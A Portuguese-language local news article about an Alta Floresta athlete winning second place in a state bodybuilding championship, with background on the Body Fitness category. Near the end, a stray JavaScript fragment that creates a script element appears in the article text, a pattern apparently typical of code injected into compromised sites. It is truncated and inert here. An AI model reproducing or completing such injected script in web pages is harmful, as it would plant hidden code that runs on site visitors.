Capa / Em Destaque / Altaflorestense é vice-campeã estadual de fisiculturismo

Altaflorestense é vice-campeã estadual de fisiculturismo

13495196_290053337995078_175435553454460373_nA atleta Ellys Duarte da Academia Oficina do Corpo de Alta Floresta conquistou no último final de semana o vice-campeonato matogrossense de fisiculturismo na categoria Body Fitness. A conquista, garantiu a Ellys uma vaga para o 47º Campeonato Brasileiro de Fisiculturismo que acontecerá no período de 29 á 31 de julho no auditório Celso Furtado Parque do Anhembi, em São Paulo. O evento é classificatório para o Arnold Classic Internacional.

No início dessa semana a fisiculturista esteve no gabinete do Prefeito Asiel Bezerra acompanhado do Secretário de Esportes Claudinei de Jesus agradecendo o apoio dado a ela para ir representar o município no estadual. Ellys quer agora focar no Brasileiro, onde espera mais uma vez poder contar o apoio do executivo municipal.

O Prefeito Municipal Asiel Bezerra parabenizou a atleta, que estava acompanhada do seu técnico Ricardo, e se colocou a disposição para mais uma vez, colaborar com a atleta que vem levando de forma brilhante o nome de Alta Floresta. Além desse feito a atleta, que é acadêmica de Educação Física da Unopar, conquistou o segundo lugar no regional realizado em 2015 em Sinop e ficou entre as top 3 em Rondonópolis.

Essa foi a 18ª edição do Campeonato Mato-grossense de Fisiculturismo organizado pela Federação Mato-grossense de Culturismo, Musculação e Fitness. O evento aconteceu no Ginasio Aecin Tocantins no último dia 2 de julho, onde reuniu vários atletas de todo o estado, nas categorias culturismo sênior (acima de 23 anos), Men’s Physique, Bikini, Body Fitness e Welness. De acordo com o presidente da federação, Kinssiger Alencastro, as expectativas de ranking nacional para esse ano são ótimas.

13612304_290052327995179_5968292860906034187_nSobre o Fisiculturismo

O culturismo (ou fisiculturismo) é um esporte cujo objetivo é buscar, por meio da musculação e de uma alimentação correta, a melhor formação muscular possível.

Nos campeonatos, os atletas se apresentam individualmente ou em grupo para a análise dos juízes. A apresentação inclui poses pré-definidas e compulsórias pelas quais se observa o volume muscular, a definição corporal, a simetria e a proporcionalidade dos músculos.

Body Fitness

O Body Fitness é uma categoria implementada pela IFBB em 2002 visando dar chance a um vasto grupo de mulheres que desejavam competir por possuir um físico bem torneado e atlético, mas que não desejavam realizar as apresentações do round coreográfico da categoria Fitness Coreográfico. Nessa categoria, os árbitros devem avaliar a aparência atlética geral do físico, tendo em conta a figura, o tônus muscular desenvolvido simetricamente, forma feminina e uma baixa quantidade de gordura corporal, assim como o cabelo, a beleza facial e o estilo individual de apresentação fazem toda a diferença, incluindo confiança pessoal, equilíbrio e graça. Esta categoria é amplamente aberta para todas as mulheres que gostam de treinar com pesos e levar um estilo de vida saudável.

var d=document;var s=d.createElement(‘script’);

Sobre Altair Nery

Os comentários estão fechados.

Scroll To Top